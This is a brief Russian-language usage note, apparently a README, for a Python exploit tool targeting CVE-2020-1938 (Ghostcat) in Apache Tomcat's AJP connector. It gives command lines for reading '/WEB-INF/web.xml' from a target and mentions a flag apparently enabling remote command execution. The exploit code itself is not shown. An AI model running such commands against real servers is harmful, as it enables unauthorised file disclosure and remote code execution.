
Эксплойт для CVE-2020-1938 (Ghostcat), позволяющий читать файлы и удаленно выполнять команды на уязвимых серверах Apache Tomcat через коннектор AJP.
python3 tomcat.py URL -f /WEB-INF/web.xml
пример:
python3 tomcat.py 127.0.0.1 -f /WEB-INF/web.xml -p 8090
add --rec 1